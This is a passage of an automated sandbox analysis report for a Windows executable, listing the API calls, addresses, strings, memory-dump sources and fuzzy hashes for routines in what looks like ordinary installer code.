                                                                                  • Opcode Fuzzy Hash: 48654442b45b242062e68cf3d97dab4c0ed917fb54e1286c856b08e600caecae
                                                                                  • Instruction Fuzzy Hash: C401A230600604AFDB10EBA98C42E2E73A8EB49755F10457ABC10E73C3EE389D059B18
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042E9D2
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                  • InterlockedExchange.KERNEL32(0049C660,00000001), ref: 0042E9E9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                  • API String ID: 3478007392-2498399450
                                                                                  • Opcode ID: 29e3fe99fd39411a87420eaca3bfaa87a3f8c8d91b56c7102c175830130eccb1
                                                                                  • Instruction ID: c49eaaa8fdb071360f38502b50e3c23bad510ecb3814e64996c12b789333cacc
                                                                                  • Opcode Fuzzy Hash: 29e3fe99fd39411a87420eaca3bfaa87a3f8c8d91b56c7102c175830130eccb1
                                                                                  • Instruction Fuzzy Hash: 78E0ECB1740314AAEA10AB62AECBF662558AB24F19F902437F101B51E2C7FC0C84C92D
                                                                                  APIs
                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477FD8
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004780CF,0049D0A8,00000000), ref: 00477FEB
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477FF1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                                  • API String ID: 1782028327-3855017861
                                                                                  • Opcode ID: 4365f07802c1d4a062b6a547225ad7893818e73781abac978e1d5f5c77ef267c
                                                                                  • Instruction ID: f8b3738cd9567d8133e7bb9c55c493c63169bafd132c11812e06eb582868bf74
                                                                                  • Opcode Fuzzy Hash: 4365f07802c1d4a062b6a547225ad7893818e73781abac978e1d5f5c77ef267c
                                                                                  • Instruction Fuzzy Hash: 92D0C7B168074165D95073B54D4EF9F225C9A4471C715C83FB548E2185DE7CD809457D
                                                                                  APIs
                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                  • SaveDC.GDI32(?), ref: 00416C93
                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                  • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                  • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                  • String ID:
                                                                                  • API String ID: 3808407030-0
                                                                                  • Opcode ID: 6e943c95b49c6f236292f7e3f4c968b2c26fc47392d5a45f7d0b8c39400a8a14
                                                                                  • Instruction ID: fd6e93c78d11005d9ba704e8aa7896ba8bfa997e2438936ed7ae042a7726967b
                                                                                  • Opcode Fuzzy Hash: 6e943c95b49c6f236292f7e3f4c968b2c26fc47392d5a45f7d0b8c39400a8a14
                                                                                  • Instruction Fuzzy Hash: 67411C70A04204AFDB04DB99D985FAAB7F9FF48304F1680AEE4059B362D778ED45CB58
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                  • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                  • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                  • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 37c779b953a04f4a12efe840b5dae96d6b1eda754ba999e5db1c97090b84cbca
                                                                                  • Instruction ID: 3a43d17cedf841754d2741ff269161da15bdaac6ac028e7563c87cbc4d8d060b
                                                                                  • Opcode Fuzzy Hash: 37c779b953a04f4a12efe840b5dae96d6b1eda754ba999e5db1c97090b84cbca
                                                                                  • Instruction Fuzzy Hash: 87219D707507057AE710BB66CC82F5B76ECEB41708F94043EB541AB2D2DF78AD41861C
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                  • GetDC.USER32(00000000), ref: 0041BC22
                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC69
                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                  • String ID:
                                                                                  • API String ID: 1095203571-0
                                                                                  • Opcode ID: 6e5f92cac6927d4c8622965cf5499bf0577c4e8cc05c04df1912703be0f6a612
                                                                                  • Instruction ID: c69e797babd58ff3ff02391fbdd927ad6b6ed61c45feb1cc22c7e7fbd0aaf132
                                                                                  • Opcode Fuzzy Hash: 6e5f92cac6927d4c8622965cf5499bf0577c4e8cc05c04df1912703be0f6a612
                                                                                  • Instruction Fuzzy Hash: BA314F74E00209EFDB04DFA5CA41AAEB7F5EB48700F1185AAF514AB381D7789E40DB98
                                                                                  APIs
                                                                                    • Part of subcall function 0045D0F4: SetLastError.KERNEL32(00000057,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D15F
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473AE8,?,?,0049D1E0,00000000), ref: 00473AA1
                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00473AE8,?,?,0049D1E0,00000000), ref: 00473AB7
                                                                                  Strings
                                                                                  • Setting permissions on registry key: %s\%s, xrefs: 00473A66
                                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 00473AAB
                                                                                  • Failed to set permissions on registry key (%d)., xrefs: 00473AC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                  • API String ID: 1452528299-4018462623
                                                                                  • Opcode ID: 4607364518860baa8c25b99786c39b8e95e77fc7ad03eb8564835eea2eb2ed49
                                                                                  • Instruction ID: 0b47f7c1dfc919aadf9eca7aecddead5c0e22d63d641398338859fb193043b06
                                                                                  • Opcode Fuzzy Hash: 4607364518860baa8c25b99786c39b8e95e77fc7ad03eb8564835eea2eb2ed49
                                                                                  • Instruction Fuzzy Hash: 29219570A042445FCB10DFA9D8426EEBBE8EF49315F50817BE448E7392D7785E05CBA9
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                  • String ID:
                                                                                  • API String ID: 262959230-0
                                                                                  • Opcode ID: 353a0757e9fd9d11b623670cfd803f5b8829311614747a855f6672fd601e9639
                                                                                  • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                  • Opcode Fuzzy Hash: 353a0757e9fd9d11b623670cfd803f5b8829311614747a855f6672fd601e9639
                                                                                  • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                  APIs
                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                  • RealizePalette.GDI32(00000000), ref: 00414431
                                                                                  • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414445
                                                                                  • RealizePalette.GDI32(00000000), ref: 0041444B
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00414456
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$RealizeSelect$Release
                                                                                  • String ID:
                                                                                  • API String ID: 2261976640-0
                                                                                  • Opcode ID: c27572ba3b318a97157e2ff630850643e717ce291e632f808275401916b3f835
                                                                                  • Instruction ID: 45e707893e7549553209a356c9d37de8c9d5e61d21803148832d8e75357fff83
                                                                                  • Opcode Fuzzy Hash: c27572ba3b318a97157e2ff630850643e717ce291e632f808275401916b3f835
                                                                                  • Instruction Fuzzy Hash: 6B01D47120C3806AD600A63D8C85A9F6BEC8FC6318F05946EF584DB3C2C979C8008761
                                                                                  APIs
                                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407013
                                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040708D
                                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070E5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                                  • String ID: Z
                                                                                  • API String ID: 3604996873-1505515367
                                                                                  • Opcode ID: 33049c7ea11c30121095e337e56ababc2e5377dae656412ba48cd4e8f0b87484
                                                                                  • Instruction ID: bcee853a6b72702f38c87c8f124e100014cbe8ba86cd5f63ed9636da07a90c42
                                                                                  • Opcode Fuzzy Hash: 33049c7ea11c30121095e337e56ababc2e5377dae656412ba48cd4e8f0b87484
                                                                                  • Instruction Fuzzy Hash: 1C515170E042089FDB15DF65C941A9EBBB9EF09304F1081BAE900BB3D1D778AE458F5A
                                                                                  APIs
                                                                                  • SetRectEmpty.USER32(?), ref: 0044D0C2
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D0ED
                                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D175
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DrawText$EmptyRect
                                                                                  • String ID:
                                                                                  • API String ID: 182455014-2867612384
                                                                                  • Opcode ID: 6196a861e208648b27b20abb2373d7b11b2b7b03d09eecf030d190a78f0ec511
                                                                                  • Instruction ID: 523be4b6c2791812100f8c37f9dfaf26ef338fc18bb75760613781b343a57c3a
                                                                                  • Opcode Fuzzy Hash: 6196a861e208648b27b20abb2373d7b11b2b7b03d09eecf030d190a78f0ec511
                                                                                  • Instruction Fuzzy Hash: 5E516170E00248AFEB11DFA9C885BDEBBF9BF49304F14447AE845EB252D7789944CB64
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0042EFFE
                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0042F021
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0042F100
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                  • String ID: ...\
                                                                                  • API String ID: 3133960002-983595016
                                                                                  • Opcode ID: c0d9c5121ec3aa9e9e44613710b25e7259c00030b0a3b9e9a82ef93a81d8c198
                                                                                  • Instruction ID: fc9511131d6b73f8b5d25d5b58e31b0db863437dcfa52910c3569242d90b8927
                                                                                  • Opcode Fuzzy Hash: c0d9c5121ec3aa9e9e44613710b25e7259c00030b0a3b9e9a82ef93a81d8c198
                                                                                  • Instruction Fuzzy Hash: C6316370B00128ABDB11DF96D841BAEB7F8EB48704FD1447BF410A7292D7785E45CA59
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A1F
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A2F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle
                                                                                  • String ID: .tmp$_iu
                                                                                  • API String ID: 3498533004-10593223
                                                                                  • Opcode ID: 46e4244ac8577cde88a7cde4842e0d43aa75befccb9c2852c0b530efd0552fc6
                                                                                  • Instruction ID: b5244aac63c968e20baa0947e479141d383441796118bbd3b2ad3f6bf7aa4b2b
                                                                                  • Opcode Fuzzy Hash: 46e4244ac8577cde88a7cde4842e0d43aa75befccb9c2852c0b530efd0552fc6
                                                                                  • Instruction Fuzzy Hash: 94319770E40149ABCB01EFA5C942B9EFBB5AF44349F60447AF840B72C2D7785F058A99
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                  • RegisterClassA.USER32(?), ref: 004164DE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoRegisterUnregister
                                                                                  • String ID: @
                                                                                  • API String ID: 3749476976-2766056989
                                                                                  • Opcode ID: f63e7bba2927d9b20c5332474012c1eec1724a49959d6227c5091a8278f22a45
                                                                                  • Instruction ID: 0582e4decd83047b7d259989b1a1a5a7d11b83513a4c29c925389085b8c31041
                                                                                  • Opcode Fuzzy Hash: f63e7bba2927d9b20c5332474012c1eec1724a49959d6227c5091a8278f22a45
                                                                                  • Instruction Fuzzy Hash: 9E316F706042409BD720EF68C881B9B77E5AB85308F04457FF989DB396DB39D984CB6A
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00499238,00000000,004989DE,?,?,00000000,0049C628), ref: 00498958
                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00499238,00000000,004989DE,?,?,00000000,0049C628), ref: 00498981
                                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049899A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$Move
                                                                                  • String ID: isRS-%.3u.tmp
                                                                                  • API String ID: 3839737484-3657609586
                                                                                  • Opcode ID: 481a7bc48378292d0d9514443bc536ceeed31eb1900f78afcde6c41445521250
                                                                                  • Instruction ID: b5053b6e7fa7181d8d55ffb0211e93ede9ed2a916a95833b3805d60610295bd2
                                                                                  • Opcode Fuzzy Hash: 481a7bc48378292d0d9514443bc536ceeed31eb1900f78afcde6c41445521250
                                                                                  • Instruction Fuzzy Hash: 1D2158B1D00159AFDF01DFA9C8819BFBBB8EB55314F11453FB414B72D1DA389E018A5A
                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                  • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitMessageProcess
                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                  • API String ID: 1220098344-2970929446
                                                                                  • Opcode ID: d2d2115462cf46c609d5747887fa32ed032da6f71deecf4a39b0bc855ac853b0
                                                                                  • Instruction ID: fb75bd3449ddbba25be9859e6e9cdae11be236df4b8f13ef698ff7f8a35764cd
                                                                                  • Opcode Fuzzy Hash: d2d2115462cf46c609d5747887fa32ed032da6f71deecf4a39b0bc855ac853b0
